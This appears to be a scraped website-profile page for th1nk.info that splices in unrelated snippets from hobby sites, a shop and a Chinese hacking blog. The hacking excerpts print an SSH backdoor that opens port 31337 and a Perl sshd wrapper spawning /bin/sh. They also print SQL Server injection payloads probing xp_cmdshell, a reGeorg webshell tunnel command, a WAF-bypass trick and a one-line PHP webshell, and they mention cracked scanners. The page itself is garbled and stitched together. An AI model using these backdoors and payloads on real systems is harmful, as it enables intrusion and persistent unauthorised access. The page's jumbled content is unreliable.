th1nk.info
音符's Blog关注苍老师与波多野老师
http://www.th1nk.info/
关注苍老师与波多野老师
http://www.th1nk.info/
TODAY'S RATING
>1,000,000
Date Range
HIGHEST TRAFFIC ON
Friday
LOAD TIME
4.3 seconds
website
jason iloveyou
be●●ng
be●●ng , beijing, 123456
CN
View this contact
website
jason iloveyou
be●●ng
be●●ng , beijing, 123456
CN
View this contact
website
jason iloveyou
be●●ng
be●●ng , beijing, 123456
CN
View this contact
website
jason iloveyou
be●●ng
be●●ng , beijing, 123456
CN
View this contact
BUY YOUR DOMAIN
GoDaddy.com, LLC (R171-LRMS)
WHOIS : whois.afilias.info
REFERRED :
PAGES IN
THIS WEBSITE
0
SSL
EXTERNAL LINKS
58
SITE IP
133.130.52.207
LOAD TIME
4.328 sec
SCORE
6.2
音符's Blog | th1nk.info Reviews
https://th1nk.info
关注苍老师与波多野老师
SudoHac's BLoG.为了梦想 Fighting !-Page 5
http://fuzzzz.net/page/5
SudoHac's BLoG.为了梦想 Fighting! 作者 Chora 漏洞文件app/buyer groupbuy.app.php function exit group() { $id = empty($ GET['id'])? 0 : $ GET['id']; /. Http:/ www.wooyun.org/bugs/wooyun-2013-026915 (在注入出的hash无法破解的情况下) phpcmsv9在数据库中存储着session . Burpsuite pro v1.5.18 破解版. Siteserver 3.6.3版SQL注入漏洞. 作者 10457793 siteserver 3.6.3版本 SQL注入漏洞。 扫描siteserver 3.6.3版本目录结构,获得URL如下 http:/ www.domain.gov.cn/siteserver/. 你好,我是在乌云看到您的 想与你合作点业务 请联系我邮箱:sdjsdjweb@. 加个友链吧 链接已加 网站名称 40huo's blog 网站地址 htt. 2016 SudoHac's BLoG.
Other – SudoHac's BLoG.
http://fuzzzz.net/category/other
你好,我是在乌云看到您的 想与你合作点业务 请联系我邮箱:sdjsdjweb@. 加个友链吧 链接已加 网站名称 40huo's blog 网站地址 htt. 2016 SudoHac's BLoG.
SSH渗透技巧 – SudoHac's BLoG.
http://fuzzzz.net/pentest/276.html
你的位置 SudoHac's BLoG. Mickey@vic: # ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;. Root@localhost ]# cd /usr/sbin [root@localhost sbin]# mv sshd ./bin [root@localhost sbin]# echo '#! Usr/bin/perl' sshd [root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) = / .4A/);' sshd [root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' sshd [root@localhost sbin]# chmod u x sshd [root@localhost sbin]# /etc/init.d/sshd restart. 转载请注明 SudoHac's BLoG. 2016 SudoHac's BLoG.
学习笔记 – SudoHac's BLoG.
http://fuzzzz.net/category/note
今天我们的威胁情报系统显示知名的web漏洞扫描器AWVS 10被爆出一个本地权限提升漏洞,漏洞详情及POC https:/ www.exploit-db.com/exploits/38847/ 漏洞分析 根据作者的描述,问题是出现在AWVS 10 . 写在前面的话 你是否喜欢漂亮妹子 & am. 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口 肉鸡上执行 mickey@vic: # ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337; 就会派生一个31337端口. 8212;————————————获取基本信息————. Bash漏洞为什么能够执行 Bash漏洞的原理 BASH除了可以将shell变量导出为环境变量,还可以将shell函数导出为环境变量 当前版本的bash通过以函数名作为环境变量名,以 { 开头的字串作为环境变量的值来将函数定义导出为环境变量。 你好,我是在乌云看到您的 想与你合作点业务 请联系我邮箱:sdjsdjweb@. 加个友链吧 链接已加 网站名称 40huo's blog 网站地址 htt.
代码审计 – SudoHac's BLoG.
http://fuzzzz.net/category/audit
最近渗透的时候遇到了ECSHOP,从网上搜了下,比较新的漏洞是乌云黑暗游侠提交的这两个注入 ECSHOP最新全版本通杀注入 ECSHOP全版本通杀注射之2 看了下细节,发现两个漏洞成因是一样的,都是出在手机版注册处,由于手机版在注册时没有对传入的用户. 出自 FreebuF.COM 作者 LittleHann 这里对PHP的代码审计和漏洞挖掘的思路做一下总结,都是个人观点,有不对的地方请多多指出。 作者 Chora 漏洞文件app/buyer groupbuy.app.php function exit group() { $id = empty($ GET['id'])? 0 : $ GET['id']; /. 你好,我是在乌云看到您的 想与你合作点业务 请联系我邮箱:sdjsdjweb@. 加个友链吧 链接已加 网站名称 40huo's blog 网站地址 htt. 2016 SudoHac's BLoG.
SudoHac's BLoG.为了梦想 Fighting !-Page 2
http://fuzzzz.net/page/2
SudoHac's BLoG.为了梦想 Fighting! 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口 肉鸡上执行 mickey@vic: # ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337; 就会派生一个31337端口. 8212;————————————获取基本信息————. Bash漏洞为什么能够执行 Bash漏洞的原理 BASH除了可以将shell变量导出为环境变量,还可以将shell函数导出为环境变量 当前版本的bash通过以函数名作为环境变量名,以 { 开头的字串作为环境变量的值来将函数定义导出为环境变量。 老外的开源应用 https:/ github.com/sensepost/reGeorg 非常方便,不用管操作系统,直接传shell上去,然后本. 看见乌云上有个类似的漏洞 便研究了一下,发现类似的漏洞存在不少 比如这个 SKY网络电话。 首先 注册一个号码,号码可以填写任意你喜欢的手机号 然后输入短信验证码 burp抓包 send to Intruder 把smsCode加入payloa.
SQL Server手工注入-显错注入 – SudoHac's BLoG.
http://fuzzzz.net/pentest/263.html
你的位置 SudoHac's BLoG. 8212;————————————获取基本信息————————————-. And exists (select * from sysobjects) -. And exists (select count(*) from sysobjects) - / 效率更高. Select count(*) from sysobjects-. And 1=(@ servername%2b' '%2bhost name() -. And 1=(Select count(*) FROM master.sysobjects Where xtype = 'X' AND name = 'xp cmdshell') -. And 1=(select count(*) FROM master.sysobjects where name= 'xp regread')-. And 1=quotename(db name() -. And 1=db name() %2b' '-. And 1=(select IS SRVRpreEMEMBER('sysadmin') - / 返回正常为sa.
Web应用漏洞 – SudoHac's BLoG.
http://fuzzzz.net/category/security
前几天vBulletin官方论坛被黑,随后一个叫Coldzer0的小哥在1337day上卖vBulletin 5全版本的RCE 0day,看演示很厉害,指哪打哪。 最近渗透的时候遇到了ECSHOP,从网上搜了下,比较新的漏洞是乌云黑暗游侠提交的这两个注入 ECSHOP最新全版本通杀注入 ECSHOP全版本通杀注射之2 看了下细节,发现两个漏洞成因是一样的,都是出在手机版注册处,由于手机版在注册时没有对传入的用户. WordPress 3.0-3.92 存储型XSS漏洞分析&POC. 看见乌云上有个类似的漏洞 便研究了一下,发现类似的漏洞存在不少 比如这个 SKY网络电话。 首先 注册一个号码,号码可以填写任意你喜欢的手机号 然后输入短信验证码 burp抓包 send to Intruder 把smsCode加入payloa. Http:/ www.wooyun.org/bugs/wooyun-2013-026915 (在注入出的hash无法破解的情况下) phpcmsv9在数据库中存储着session . Siteserver 3.6.3版SQL注入漏洞. 2016 SudoHac's BLoG.
利用webshell搭建socks代理 – SudoHac's BLoG.
http://fuzzzz.net/pentest/251.html
你的位置 SudoHac's BLoG. Python reGeorgSocksProxy.py -p 8080 -u http:/ upload.sensepost.net:8080/tunnel/tunnel.jsp. 转载请注明 SudoHac's BLoG. IBM appscan 9.0破解版分享. 你好,我是在乌云看到您的 想与你合作点业务 请联系我邮箱:sdjsdjweb@. 加个友链吧 链接已加 网站名称 40huo's blog 网站地址 htt. 2016 SudoHac's BLoG.
SudoHac's BLoG.为了梦想 Fighting !-Page 3
http://fuzzzz.net/page/3
SudoHac's BLoG.为了梦想 Fighting! MySQL:Got error 139 from storage engine. 今天从access往Mysql导入数据,一开始用navicat导入,导入之后会显示错误400多个 navicat不显示详细的错误信息,真是觉得无力吐槽 后来从网上找了个工具还不错 推荐一下 叫做Access2Mysql 专门从access往mysql. 前几天论坛征文写的,贴到博客上吧,欢迎各位大牛拍砖 Author:Sudo Team:F4ck Team 0x01 前言 目前市场上的WAF主要有以下几类 1. 以安全狗为代表的基于软件WAF 2. 百度加速乐、安全宝等部署在云端的W. 在渗透测试中,如果渗透数据库是Mysql 注入参数是GET型的 可以尝试利用换行符%0a做分隔符进行绕过 在Mysql中%0a是可以正常查询的 example: 1.php? Id=1 and 1=1 拦截 1.php? IIS60 会将 xx.jpg 解. Php $a=$ GET['a'];$a($ POST['cmd']);? 2016 SudoHac's BLoG.
TOTAL LINKS TO THIS WEBSITE
58
th1nk-happy-th0ughts.tumblr.com
Wherever You Go Take #HappyThoughts With You
Wherever You Go Take #HappyThoughts With You. We are here to listen to you. And we will do all we can to to help. This is just beautiful…. If I can talk to you and not be judged, reblog this. If you both feel the same about each other and you’re planning on seeing each other in August, then you can’t let yourself think of it fizzling out. From my experience, thinking in the negative often leads to the negative. An hour and a half may sound like quite far, but there are always means of travel around this.
th1nk p1nk.
Wednesday, March 27, 2013. Well, I started this little project off on Wordpress, but as it turns out they don't allow Adsense anymore. I don't care if I don't actually make any money, I'm not going to not. Have ads on my blog. I'm too poor not to scrape every penny I can these days. So, I've demanded a refund for the money I forked over to Wordpress, and eventually I'll get set up with a domain over here and we'll try this out. I can do this. I think. Subscribe to: Posts (Atom). 03/24 - 03/31 (1).
Th1nk
Diseñamos experiencias para impulsar y llevar. Ideas a la acción. Te sacamos para pensar distinto y te acompañamos a hacer realidad nuevas ideas. Quieres pensar fuera de la caja? Generamos espacios para pensar distinto, dónde la inspiración y la imaginación confluyan. Personalizamos una canasta de herramientas justa para la necesidad de tu proyecto u organización. Alineamos propósitos personales con organizacionales, y así co creamos nuevas ideas sincronizadas e impactantes. Como miembros activos de la c...
th1nk - DeviantArt
Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')" class="mi". Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')". Join DeviantArt for FREE. Forgot Password or Username? Deviant for 14 Years. Last Visit: 183 weeks ago. This deviant's activity is hidden. Deviant since Feb 8, 2002. We've split the page into zones!
音符's Blog
密码学安全 计算安全 使用蛮力攻击,在拥有大量资源的情况下,需要花费大量的时间 几十年 才能破解。 比如E是英语中使用频率最高的字母 13% ,其次是T 9%。 英文频率特性 单字母 极高频 E 次高频 T A O I N S H R 中等频 D L 低频 C U M W F G Y P B 甚低频 V K J X Q Z 英语字母频率 etaoinsrhldcumfpgwybvkxjqz 新闻报告中的字母频率 etaonisrhldcmufpgwybvkjxqz 宗教著作中的字母频率 etiaonsrhldcumfpywgbvkxjqz 科学著作中的字母频率 etaionsrhlcdumfpgybwvkxqjz 普通小说中的字母频率 etaohnisrdluwmcgfypvkbjxzq Word中字母出现的平均频率 etaoinsrhldcumfpgwybvkxjqz 摩斯电码中的字母频率 etainoshrdlcumfwygpbvkqjxz 非英语的字母频率 共统计18584个常用词汇 eairtonslcupmdhgbyfvwkxzqj 英语的字母频率 共统计45406个常用词汇 eisarnto...
th1nk.org
th1nk4y0urself (Dan) - DeviantArt
Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')" class="mi". Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')". Join DeviantArt for FREE. Forgot Password or Username? Deviant for 9 Years. This deviant's full pageview. Last Visit: 15 weeks ago. This is the place where you can personalize your profile! Favourit...
TH1NKBLENDER
STOP THINK. COLLABORATE. TH1NKBLENDER ORIGINATED AS AN IDEA BETWEEN TWO PEOPLE WHO CLASH JUST AS OFTEN AS THEY CLICK. THAT’S THE SECRET DISAGREEMENT COMPELS INGENUITY. As a creative collective. We are responsible for wide-ranging projects including &EVER, a multidisciplinary collaborative platform that purports to convene, promote and mobilize talents around the globe through carefully curated periodic publications and an online collaborative hub.
Thinklab
Is designed to allow anglers to quickly move from bottom to top fishing without having to redo knots. Built with durability and ease of use in mind, this 4-ounce sinker is ideal for use on party boats while fishing for bass, halibut, and barracuda. This product comes with a limited lifetime warranty. For more info, email us at support@th1nklab.com. You can purchase ProSinker from these SoCal retailers located within Orange County:. Mako Matt’s Marine. Designed and Manufactured in Huntington Beach, CA.
